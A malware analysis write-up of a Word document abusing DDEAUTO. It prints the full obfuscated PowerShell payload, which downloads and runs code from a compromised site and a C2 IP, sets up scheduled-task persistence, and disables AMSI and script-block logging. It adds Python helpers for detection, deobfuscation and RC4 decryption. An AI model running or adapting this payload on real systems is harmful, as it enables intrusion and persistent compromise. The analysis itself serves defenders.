Office DDE With Rad Powershell Obfuscation



$ vti 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
2017-10-16 19:51:47 INFO Starting VirusTotal Intelligence downloader
2017-10-16 19:51:47 INFO * VirusTotal Intelligence search: 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
2017-10-16 19:51:47 INFO * Number of files to download: 100
2017-10-16 19:51:47 INFO Creating folder to store the requested files
2017-10-16 19:51:47 INFO Retrieving page of file hashes to download
2017-10-16 19:51:47 INFO Retrieved 1 matching files in current page, queueing them
2017-10-16 19:51:47 INFO No more matching files
2017-10-16 19:51:47 INFO Waiting for queued downloads to finish
2017-10-16 19:51:47 INFO Downloading file 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
2017-10-16 19:51:48 INFO 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967 download was successful
2017-10-16 19:51:54 INFO The downloaded files have been saved in ./

$ file 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967: Microsoft Word 2007+

$ 7z e -so 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967 word/document.xml | sed 's/<[^>]*>//g'
Press OfficeEcumenical PatriarchateEPpress@patriarchate.org212. 774.0332To the Clergy and Staff of the Ecumenical PatriarchateOctober ‎16, 2017ISTANBUL DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell.exe $x = (New-Object Net.Webclient).downloadstring('http://citycarpark.my/components/com_admintools/mscorier'); cmd.exe /b /c $x"!Unexpected End of Formula

Hmmmm. Looks like a legit domain is hosting malware.
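The `7z e -so ... | sed` one-liner flattens `word/document.xml` so the DDE field becomes readable. The Python below is an added example, not code from the write-up: it opens an OOXML file as a zip, walks every XML part (body, headers, footers and footnotes alike), reassembles field instructions that are split across several `w:instrText` runs, and reports any `DDE`/`DDEAUTO` field it finds. It also offers the same tag-stripping view the sed command gives. The document it builds is a constructed stand-in with a harmless placeholder command, not the analyzed sample.

```python
import html
import io
import re
import zipfile

# Field markers and instruction fragments, matched in document order.
TOKEN_RE = re.compile(
    r'<w:fldChar[^>]*w:fldCharType="(begin|end)"[^>]*/?>'   # complex field begin/end
    r'|<w:instrText[^>]*>(.*?)</w:instrText>'               # instruction fragment
    r'|<w:fldSimple[^>]*w:instr="([^"]*)"',                 # single-tag field
    re.DOTALL,
)
DDE_RE = re.compile(r'\bDDE(?:AUTO)?\b', re.IGNORECASE)


def _norm(parts):
    """Join fragments and collapse whitespace so split fields read as one line."""
    return ' '.join(''.join(parts).split())


def field_instructions(xml_text):
    """Yield each complete field instruction in one WordprocessingML part.

    Instructions split across several w:instrText runs are re-joined between the
    matching fldChar begin/end markers."""
    buf = []
    for m in TOKEN_RE.finditer(xml_text):
        marker, fragment, simple = m.groups()
        if marker in ('begin', 'end'):
            if buf:
                yield _norm(buf)          # 'begin' with a non-empty buffer = unterminated field
            buf = []
        elif fragment is not None:
            buf.append(html.unescape(fragment))
        else:
            yield _norm([html.unescape(simple)])
    if buf:
        yield _norm(buf)


def find_dde_fields(docx_bytes):
    """Return [(part_name, instruction)] for every DDE/DDEAUTO field in any XML part."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith('.xml'):
                continue
            text = z.read(name).decode('utf-8', errors='replace')
            for instr in field_instructions(text):
                if DDE_RE.search(instr):
                    hits.append((name, instr))
    return hits


def flatten_part(docx_bytes, part_name='word/document.xml'):
    """The write-up's `7z e -so ... | sed 's/<[^>]*>//g'` step, in Python."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        raw = z.read(part_name).decode('utf-8', errors='replace')
    return html.unescape(re.sub(r'<[^>]*>', '', raw))


def build_sample_docx():
    """Constructed stand-in for the analyzed document (NOT the real sample): one
    DDEAUTO field split across two w:instrText runs, carrying a harmless command."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body>'
        '<w:p><w:r><w:t>To the Clergy and Staff</w:t></w:r></w:p>'
        '<w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        r'<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\windows\\system32\\cmd.exe </w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">&quot;/k echo dde-test&quot;</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p>'
        '</w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml',
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr('word/document.xml', document_xml)
    return buf.getvalue()


if __name__ == '__main__':
    sample = build_sample_docx()
    print(flatten_part(sample))                      # the sed-style view
    for part, instr in find_dde_fields(sample):      # the structured view
        print(f'{part}: {instr}')
```

Checking `w:instrText` runs rather than the flattened text avoids flagging a document that merely mentions DDE in its body, and re-joining the runs catches the fragmentation that defeats a naive string match on `DDEAUTO`.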


The payload...

$ wget http://citycarpark.my/components/com_admintools/mscorier
--2017-10-16 19:52:46-- http://citycarpark.my/components/com_admintools/mscorier
Resolving citycarpark.my... 103.6.198.162
Connecting to citycarpark.my|103.6.198.162|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6120 (6.0K)
Saving to: ‘mscorier’

mscorier 100%[===========================================================================================>] 5.98K --.-KB/s in 0s

2017-10-16 19:52:47 (127 MB/s) - ‘mscorier’ saved [6120/6120]


$ file mscorier; cat mscorier
mscorier: ASCII text, with very long lines, with no line terminators

SEt ncXA= $nBW = [TYPE]("{0}{1}" -f 'R','Ef') ;
$DMvO= [typE]("{0}{3}{6}{5}{7}{2}{8}{4}{1}" -F 'SysTEM.nET.SeRV','er','IN','I','AG','ep','C','o','Tman') ;
sET ('c'+'guo') ( [tyPe]("{0}{4}{1}{5}{3}{2}"-F 'sYsTE','t','quESt','WeBre','M.ne','.') ) ;
SeT kd7I ( [tYpe]("{0}{7}{4}{2}{6}{5}{1}{3}" -f'S','ia','Net.crede','lcAChE','.','T','N','YStEm')) ;
SeT-Item ('VaRi'+'ab'+'lE:1'+'e9'+'zq0') ([Type]("{1}{2}{4}{3}{0}{5}"-F'D','sysT','e','t.ENCo','M.tex','iNg')) ;
${regp`AtH} = ((("{10}{8}{14}{12}{15}{0}{3}{7}{4}{6}{5}{16}{9}{2}{1}{13}{11}{17}"-f'Vf','rs','e','Win','fCurr','hemes','entVersionIVfT','dowsIV','U:IVfSoft','V','HKC','o','r','i','wareIVfMic','osoftI','IVfTheme','n'))."rEPlA`cE"(([cHAR]73+[cHAR]86+[cHAR]102),[STriNg][cHAR]92));
${P`A`RTs} = ${Regp`A`TH}.("{0}{1}"-f'spl','it').Invoke('\');
${p`AtH} = ${r`e`gpaTH}.("{1}{0}"-f 'it','spl').Invoke("\\")[0..(${p`A`RTS}."co`uNt" -2)] -join '\';
${pa`YlO`AD} = (.("{0}{2}{1}"-f'New-','t','Objec') ("{2}{0}{1}" -f 'et.Webclien','t','N')).("{3}{4}{1}{2}{0}" -f'g','load','strin','d','own').Invoke(("{1}{0}{5}{2}{3}{4}{6}" -f'w','http://185.128.42.194/','rin','tprox','y','sdp','';;
));
${NA`mE} = ${P`A`RTs}[-1];
${N`Ull}=^&("{2}{4}{1}{0}{3}" -f 'pert','ro','Set-It','y','emP') -Force -Path ${pA`TH} -Name ${n`AMe} -Value ${Pa`YLO`Ad};
.("{1}{0}" -f'asks','scht') ("{1}{0}" -f 'reate','/C') ('/F') ("{0}{1}" -f'/S','C') ("{1}{0}"-f 'Y','DAIL') ("{0}{1}" -f'/S','T') ("{1}{0}" -f '00','11:') ("{1}{0}"-f 'TN','/') ("{1}{4}{2}{0}{3}"-f 'teServiceI','F','da','nit','lashUp') ("{1}{0}" -f 'R','/T') ((('C:aWXWi'+'nd'+'ows'+'aWXS'+'yste'+'m32'+'aWXWind'+'ow'+'sPo'+'w'+'erShel'+'la'+'WXv1'+'.'+'0'+'aWXpowe'+'rs'+'h'+'ell.'+'e'+'xe ') -rEPLAcE([char]97+[char]87+[char]88),[char]92)+'-c'+' '+('gfON9IKFe'+'x=K'+'F'+'e((g'+'p ')."Re`pL`ACe"('gfO',[sTRING][CHar]92)."R`EP`lAce"(([CHar]75+[CHar]70+[CHar]101),[sTRING][CHar]36)."rE`pLACe"('N9I',[sTRING][CHar]34)+(('HK'+'CU:KmpSoftwar'+'eKmpMi'+'cro'+'soft'+'KmpW'+'indow'+'s'+'KmpCur'+'rentVersionKmpT'+'heme'+'s ')-cREplACE([ChAR]75+[ChAR]109+[ChAR]112),[ChAR]92)+'ThemeVersio'+'n'+').The'+'meV'+'ersion);
cm'+'d'+'.ex'+'e '+'/'+'b '+'/c'+' '+('{'+'1}x{0}{'+'2'+'}')-f[ChAR]92,[ChAR]36,[ChAR]34);
^&("{2}{0}{1}" -f 'as','ks','scht') ("{0}{1}"-f '/C','reate') ('/F') ("{0}{1}"-f '/S','C') ("{1}{0}"-f 'Y','DAIL') ("{1}{0}" -f 'ST','/') ("{1}{0}" -f':00','15') ("{0}{1}" -f'/','TN') ("{1}{2}{3}{0}" -f 'e','Flas','hUpdateServ','ic') ("{0}{1}"-f '/T','R') ((('C'+':a'+'b1Windo'+'ws'+'ab1'+'Sy'+'s'+'te'+'m32ab1W'+'i'+'ndowsPowerShella'+'b1'+'v1.0ab1'+'po'+'we'+'r'+'shell'+'.'+'exe ') -REpLaCE'ab1',[ChAR]92)+'-'+'c '+('tqnd6sS'+'2'+'Mx=S2M('+'(gp ')."REPl`ACE"('d6s',[STrInG][chAr]34).("{0}{1}"-f'Re','plAce').Invoke('S2M',')."RePL`A`ce"(([chAr]116+[chAr]113+[chAr]110),[STrInG][chAr]92)+('H'+'K'+'CU:'+'z0x'+'So'+'ftware'+'z'+'0'+'xMicroso'+'f'+'tz0xW'+'indowsz0xCurren'+'tVer'+'sionz0'+'x'+'Th'+'emes ')."rE`plACe"(([ChaR]122+[ChaR]48+[ChaR]120),[sTrinG][ChaR]92)+'Theme'+'V'+'er'+'sion).T'+'h'+'eme'+'V'+'e'+'rsion);
c'+'md.exe '+'/b'+' '+'/c'+' '+(('A'+'Cc'+'x'+'ckgpbH')-REPlacE([cHaR]112+[cHaR]98+[cHaR]72),[cHaR]34-REPlacE'ckg',[cHaR]92 -REPlacE 'ACc',[cHaR]36));
${gR`OUPPoLiCY`SetTI`N`gS} = (ItEM VaRIABle:NBw ).vaLuE."a`Sse`mbly".("{1}{0}"-f'e','GEtTyP').Invoke(("{1}{2}{3}{4}{5}{0}"-f'tion.Utils','Sy','stem','.','Managemen','t.Automa'))."GETFiE`LD"(("{4}{0}{3}{1}{2}" -f'achedGro','cySettin','gs','upPoli','c'), 'N'+("{1}{0}{2}{3}{4}" -f 'nPu','o','blic,Sta','t','ic')).("{1}{0}"-f'EtVAlUe','G').Invoke(${NU`ll});
${GRoUP`p`oLiCySe`T`T`INgs}[("{0}{2}{1}"-f'Sc','ptB','ri')+("{3}{2}{0}{1}"-f'in','g','ckLogg','lo')][("{3}{1}{2}{0}"-f 'B','cri','pt','EnableS')+("{0}{2}{1}"-f 'l','ing','ockLogg')] = 0;
${gROu`pP`OlicYs`Etti`NGS}[("{1}{0}{2}" -f 't','Scrip','B')+("{0}{2}{1}{3}"-f'l','o','ockL','gging')][("{1}{3}{4}{0}{2}{5}"-f'ca','Enabl','tionL','e','ScriptBlockInvo','ogging')] = 0;
(GCi ("VarIAbl"+"e"+":nbw") ).valUE."a`sSE`mbLy".("{2}{0}{1}" -f'T','TYpe','GE').Invoke(("{0}{5}{1}{7}{9}{8}{6}{3}{4}{2}"-f'Sy','an','siUtils','on.A','m','stem.M','omati','a','ut','gement.A'))^|^&('?'){${_}}^|^&('%'){${_}.("{0}{2}{1}"-f'G','tFIeLD','e').Invoke(("{2}{0}{3}{1}"-f'm','nitFailed','a','siI'),("{1}{0}{4}{3}{2}" -f 'l','NonPub','ic',',Stat','ic')).("{0}{1}" -f'SeTV','aLue').Invoke(${n`Ull},${TR`ue})};
$DmVO::"EXPEc`T100c`oNt`Inue"=0;
${Wc}=.("{1}{0}{2}"-f 'bjEC','NEw-O','t') ("{4}{1}{2}{3}{5}{0}"-f 't','m.NeT.','W','ebCliE','SyStE','n');
${u}=(("{1}{4}{14}{18}{15}{12}{16}{10}{3}{17}{13}{8}{7}{9}{6}{11}{2}{5}{0}"-f 'ko','M','ke',';
','ozilla',' Gec','.','v:','r','11','s NT 6.1','0) li','ind','7.0;
','/',' (W','ow','WOW64;
Trident/','5.0'));
( gEt-VarIABle ("d"+"mVO") -vALUEo )::"sERVe`RCE`R`TIF`ic`ATeV`AliDA`T`Ionca`LLBack" = {${tR`ue}};
${WC}."HE`AD`eRS".("{1}{0}" -f'dd','A').Invoke(("{1}{0}{2}" -f 'r-Ag','Use','ent'),${u});
${wc}."p`RoXy"= ( VaRiAbLe ('C'+'GuO') -valuEo )::"DE`FaU`l`Twebp`ROXy";
${WC}."pRo`xY"."cRe`dEn`TiALs" = $Kd7i::"d`efAULTn`ET`Wo`RKc`ReDe`NtiAls";
${k}= $1E9zq0::"As`cII".("{2}{0}{1}"-f 'ETBY','tes','G').Invoke(("{3}{0}{2}{5}{4}{1}"-f '31fe76','147f53229c8e02','90a85','a2','eb','f02'));
${r}={${D},${K}=${AR`Gs};
${s}=0..255;
0..255^|^&('%'){${j}=(${J}+${s}[${_}]+${k}[${_}%${K}."CO`UNt"])%256;
${S}[${_}],${s}[${j}]=${s}[${j}],${s}[${_}]};
${D}^|.('%'){${i}=(${i}+1)%256;
${h}=(${H}+${S}[${i}])%256;
${s}[${I}],${S}[${h}]=${S}[${H}],${s}[${I}];
${_}-BXor${s}[(${s}[${i}]+${s}[${H}])%256]}};
${Wc}."HEA`deRS".("{0}{1}"-f 'Ad','d').Invoke(("{0}{1}" -f 'Cooki','e'),("{2}{6}{1}{3}{4}{0}{5}" -f'V3v9eyml','on=j4','s','ppw/','hpWdU/l5','AYxmE=','essi'));
${S`eR}=("{4}{5}{2}{3}{6}{0}{7}{1}{8}"-f'94','8','tp','s:/','h','t','/185.128.42.1',':','080');
${t}=("{1}{0}" -f 's.php','/new');
${d`ATA}=${W`c}.("{0}{1}{2}"-f'Do','wNLO','AdDATA').Invoke(${s`eR}+${T});
${Iv}=${D`AtA}[0..3];
${D`Ata}=${dA`Ta}[4..${da`Ta}."l`ENG`TH"];
-joiN[ChaR[]](^& ${R} ${dA`TA} (${iv}+${K}))^|.("{1}{0}"-f'EX','I')&& sET GkOUh=echo iEx ([eNviRonmENt]::GEtEnVIRoNMenTVaRiABLE('NCxA','prOCEss')) ^|PoWErshell -NoexI -noninT -executIoNpoliC BypaSS -WiNd HiDDEN -nOP -&&C:\WINdOwS\sYStem32\cmd.exE /c %GKouh%



http://185.128.42.194/wsdprintproxy

SEt NeI= ${1`h7`Vk8} =[tYPe]("{0}{1}"-f're','f') ;
${kj`I82} = [TYpE]("{1}{4}{3}{6}{0}{2}{5}"-F'tMAnaG','SY','e','Et.SeR','stEM.N','r','VICePOIn') ;
${Yk`s4} =[tyPE]("{3}{0}{4}{1}{2}"-F'Y','m.neT.WEB','requESt','S','sTE') ;
.('SV') ("{1}{0}" -f'6','bqXT') ( [Type]("{0}{4}{6}{1}{7}{3}{2}{5}" -f's','NET.','i','t','Y','alcaChE','STem.','creDen') ) ;
.("{0}{1}{2}"-f 'SET-VA','RIA','BLE') ("{0}{1}"-f'KO','5W') ( [TYPE]("{3}{0}{2}{5}{1}{4}"-f 'YSt','E','eM.t','S','NCODIng','EXt.') ) ;
${Grou`pPOL`iCyS`E`Tti`NGs} = ( .("{1}{2}{0}" -f 'ABle','var','i') ('1H7Vk'+'8') )."VAL`Ue"."as`SeMBLy".("{1}{0}{2}"-f 'yp','GeTT','E').Invoke(("{3}{4}{2}{5}{1}{0}"-f'omation.Utils','ment.Aut','m.Mana','Syst','e','ge'))."GeTFIE`lD"(("{3}{1}{6}{5}{0}{4}{2}"-f 'etti','achedGrou','s','c','ng','S','pPolicy'), 'N'+("{0}{2}{4}{1}{3}"-f 'on','c,St','Pub','atic','li')).("{2}{1}{0}"-f 'E','VaLU','Get').Invoke(${n`ULL});
${GRo`U`pPO`LICySettiN`Gs}[("{1}{0}" -f 'criptB','S')+("{2}{1}{0}"-f 'ing','Logg','lock')][("{3}{2}{1}{0}"-f 'riptB','bleSc','a','En')+("{3}{1}{2}{0}" -f 'g','o','ckLoggin','l')] = 0;
${gR`O`UPpOli`CyS`eT`TI`NgS}[("{0}{1}{2}"-f 'Scri','p','tB')+("{3}{2}{1}{0}" -f 'gging','kLo','oc','l')][("{3}{5}{2}{0}{10}{7}{4}{9}{1}{8}{6}"-f'B','io','t','Enab','o','leScrip','ging','v','nLog','cat','lockIn')] = 0;
(^&("{1}{0}{2}" -f'a','GEt-vaRI','blE') ("1"+"h7vK8") )."VaL`UE"."AS`s`Embly".("{1}{0}" -f 'PE','GETTY').Invoke(("{6}{5}{2}{4}{0}{3}{1}" -f'.AmsiU','s','ent.A','til','utomation','.Managem','System'))^|^&('?'){${_}}^|.('%'){${_}.("{1}{0}" -f 'lD','GETFiE').Invoke(("{2}{1}{0}" -f 'ed','tFail','amsiIni'),("{2}{3}{1}{0}{4}"-f ',Sta','nPublic','N','o','tic')).("{1}{0}{2}"-f'tVALu','Se','E').Invoke(${n`Ull},${Tr`UE})};
${kJI`82}::"eXpeCt100c`o`NTIn`Ue"=0;
${wC}=.("{2}{0}{1}" -f 'OBjeC','t','NEw-') ("{4}{5}{0}{3}{2}{1}" -f'B','Nt','lIe','C','SY','Stem.NEt.We');
${U}=(("{9}{13}{0}{17}{19}{16}{18}{8}{6}{7}{15}{3}{14}{11}{10}{4}{12}{1}{2}{5}"-f'.0','G','ec','en',' l','ko','r','i','T','Mozil','11.0)','7.0;
rv:','ike ','la/5','t/','d',' NT 6.1;
',' (Wi',' WOW64;
','ndows'));
( ^&("{0}{1}{2}"-f'cH','ildI','teM') ("{0}{2}{3}{1}" -f 'v',':kji82','Ar','IaBle'))."VA`LuE"::"SEr`VERcERTif`Ica`TE`VaLID`A`TIo`NCa`LlBA`CK" = {${t`RUe}};
${W`C}."HE`AdE`RS".("{0}{1}" -f 'A','dD').Invoke(("{3}{2}{1}{0}" -f't','-Agen','ser','U'),${U});
${WC}."PrO`Xy"= ${yk`s4}::"D`EFa`Ul`Twe`BpRoXY";
${W`c}."pRo`XY"."C`RE`dEnT`IAls" = ${b`qXT6}::"dEFauL`TnEtw`or`KC`R`ED`ENtialS";
${k}= ${K`o5W}::"aSC`II".("{0}{1}{2}"-f 'GE','T','BytEs').Invoke(("{1}{8}{4}{5}{7}{6}{2}{3}{0}"-f 'f53229c8e02','a231','02e','b147','e','769','5f','0a8','f'));
${R}={${D},${k}=${A`Rgs};
${S}=0..255;
0..255^|.('%'){${J}=(${j}+${S}[${_}]+${k}[${_}%${k}."cou`Nt"])%256;
${S}[${_}],${S}[${j}]=${s}[${j}],${s}[${_}]};
${D}^|.('%'){${I}=(${I}+1)%256;
${H}=(${H}+${s}[${I}])%256;
${S}[${I}],${S}[${H}]=${S}[${h}],${S}[${i}];
${_}-BXOR${s}[(${s}[${I}]+${S}[${H}])%256]}};
${W`C}."HEa`ders".("{1}{0}"-f 'dD','A').Invoke(("{0}{1}"-f 'C','ookie'),("{1}{5}{4}{3}{0}{7}{8}{2}{6}" -f '6P4WA','s','PI','I','on=F','essi','vQyr1XM0=','qcTBaDH','RXU'));
${S`er}=("{7}{1}{2}{4}{5}{3}{6}{0}"-f '080','//185','.','42','128','.','.194:8','https:');
${t}=("{2}{0}{1}" -f 's.ph','p','/new');
${d`AtA}=${w`c}.("{3}{0}{2}{1}"-f 'Wnl','tA','oaDDA','DO').Invoke(${S`ER}+${T});
${I`V}=${d`Ata}[0..3];
${dA`Ta}=${D`ATA}[4..${da`Ta}."Le`NGTh"];
-JoIN[ChAR[]](^& ${r} ${Da`Ta} (${iV}+${k}))^|.("{0}{1}"-f'I','EX')&&sEt SZo=ecHo iEX ([enVIronmenT]::GEtenviROnmeNtVARIAbLe('nEI','proCESS')) ^|POwERsheLl -noEXIT -exeCu BYpASs -nopROFiLE -NOniNT -wIndOW 1 - && c:\WinDoWs\SysTem32\CMD.exE /c%szO%
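Both stages above lean on the same four cosmetic tricks: `-f` format strings with shuffled indices, `[char]N` sums standing in for separator characters such as the backslash, `'a'+'b'` concatenation, and backticks inside variable and member names. The Python below is an added example for reading such a sample, not code from the write-up and not a general PowerShell parser: it applies regex rewrites for exactly those four patterns until the text stops changing, which is enough to surface the type names, registry path and URLs in this script. It deliberately does not evaluate `-replace` or `.Replace()` calls, so stand-in tokens like `IVf` stay visible for the analyst to resolve by eye, and a string containing a literal single quote is treated as unsupported.

```python
import re

# ("{1}{0}" -f 'b','a')  : the whole parenthesised -f expression with quoted args
FORMAT_RE = re.compile(
    r"""\(\s*"((?:\{\d+\})+)"\s*-[fF]\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)"""
)
CHAR_RE = re.compile(r'\[char\](\d+)', re.IGNORECASE)     # [cHaR]92
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")      # 'ab'+'cd'
TICK_RE = re.compile(r'(?<=\w)`(?=\w)')                    # ${na`me}, "rE`pLACe"


def _quote(s):
    """Wrap s as a PowerShell single-quoted literal (embedded quote is doubled)."""
    return "'" + s.replace("'", "''") + "'"


def _resolve_format(m):
    fmt, raw_args = m.groups()
    args = re.findall(r"'([^']*)'", raw_args)
    try:
        joined = ''.join(args[int(i)] for i in re.findall(r'\{(\d+)\}', fmt))
    except IndexError:
        return m.group(0)        # malformed expression: leave it untouched
    return '(' + _quote(joined) + ')'


def deobfuscate(code, max_rounds=50):
    """Peel format-string, [char], concatenation and backtick layers to a fixed point.

    Caveat: the backtick pass also strips escapes like `n inside double-quoted
    strings, which is acceptable for reading this style of script."""
    for _ in range(max_rounds):
        before = code
        code = CHAR_RE.sub(lambda m: _quote(chr(int(m.group(1)))), code)
        code = CONCAT_RE.sub(lambda m: _quote(m.group(1) + m.group(2)), code)
        code = FORMAT_RE.sub(_resolve_format, code)
        code = TICK_RE.sub('', code)
        if code == before:
            break
    return code


# Fragments copied from the first stage shown above.
SAMPLES = [
    """[TYPE]("{0}{1}" -f 'R','Ef')""",
    """[typE]("{0}{3}{6}{5}{7}{2}{8}{4}{1}" -F 'SysTEM.nET.SeRV','er','IN','I','AG','ep','C','o','Tman')""",
    """${regp`AtH} = ("{10}{8}{14}{12}{15}{0}{3}{7}{4}{6}{5}{16}{9}{2}{1}{13}{11}{17}"-f'Vf','rs','e','Win','fCurr','hemes','entVersionIVfT','dowsIV','U:IVfSoft','V','HKC','o','r','i','wareIVfMic','osoftI','IVfTheme','n')."rEPlA`cE"(([cHAR]73+[cHAR]86+[cHAR]102),[STriNg][cHAR]92)""",
]

if __name__ == '__main__':
    for s in SAMPLES:
        print(deobfuscate(s))
```

Run over the third sample the output shows `('HKCU:IVfSoftwareIVf...ThemeVersion')."rEPlAcE"(('IVf'),[STriNg]'\')`, which makes it plain that `IVf` is swapped for a backslash and that the script reads `HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\ThemeVersion`, the registry value where the downloaded second stage is stored.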




https://185.128.42.194:8080/cgi-bin/
https://185.128.42.194:8080
https://185.128.42.194:8080/news.php

Cookie
session=j4ppw/hpWdU/l5V3v9eymlAYxmE=
session=FI6P4WAqcTBaDHRXUPIvQyr1XM0=
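Both stages finish the same way: they fetch `/news.php` from the `https://185.128.42.194:8080` server with the cookie above, take the first four bytes of the response as an IV, and pass the rest through the `${r}` scriptblock, which is RC4 keyed with the IV followed by the ASCII bytes of `${k}`. The Python below is an added example for an incident responder who has a captured response and wants the plaintext offline; it is not the sample's code. The key string and the blob it round-trips are constructed placeholders, and the two public RC4 test vectors in `__main__` only confirm the primitive matches the script's key schedule and keystream loop.

```python
# RC4 as implemented by the sample's ${r} scriptblock: a 256-byte state,
# key-scheduling over the key bytes, then keystream XOR of the data.


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA); encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                      # PRGA
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def unwrap_response(blob: bytes, key_str: str) -> bytes:
    """Mirror of the sample's handling of a C2 response:
    IV = blob[0..3], stream key = IV || ASCII(key_str), decrypt blob[4..]."""
    if len(blob) < 4:
        raise ValueError('response shorter than the 4-byte IV')
    iv, body = blob[:4], blob[4:]
    return rc4(iv + key_str.encode('ascii'), body)


def wrap_response(plaintext: bytes, key_str: str, iv: bytes) -> bytes:
    """Inverse of unwrap_response; used here only to build constructed test data."""
    if len(iv) != 4:
        raise ValueError('IV must be exactly 4 bytes')
    return iv + rc4(iv + key_str.encode('ascii'), plaintext)


if __name__ == '__main__':
    # Public RC4 known-answer vectors (key "Key" / "Plaintext", key "Wiki" / "pedia").
    assert rc4(b'Key', b'Plaintext').hex() == 'bbf316e8d940af0ad3'
    assert rc4(b'Wiki', b'pedia').hex() == '1021bf0420'

    # Constructed placeholder key and response; the real ${k} is the 32-character
    # hex-looking string the script assembles with the same -f trick.
    key_str = 'constructed-placeholder-key'
    captured = wrap_response(b"Write-Host 'constructed second stage'", key_str, b'\x01\x02\x03\x04')
    print(unwrap_response(captured, key_str).decode('ascii'))
```

Note that the IV is sent in the clear in front of the ciphertext and is simply prepended to a fixed key, so anyone holding the key string recovered from the script can decrypt every response for that campaign, which is what makes this worth automating during response.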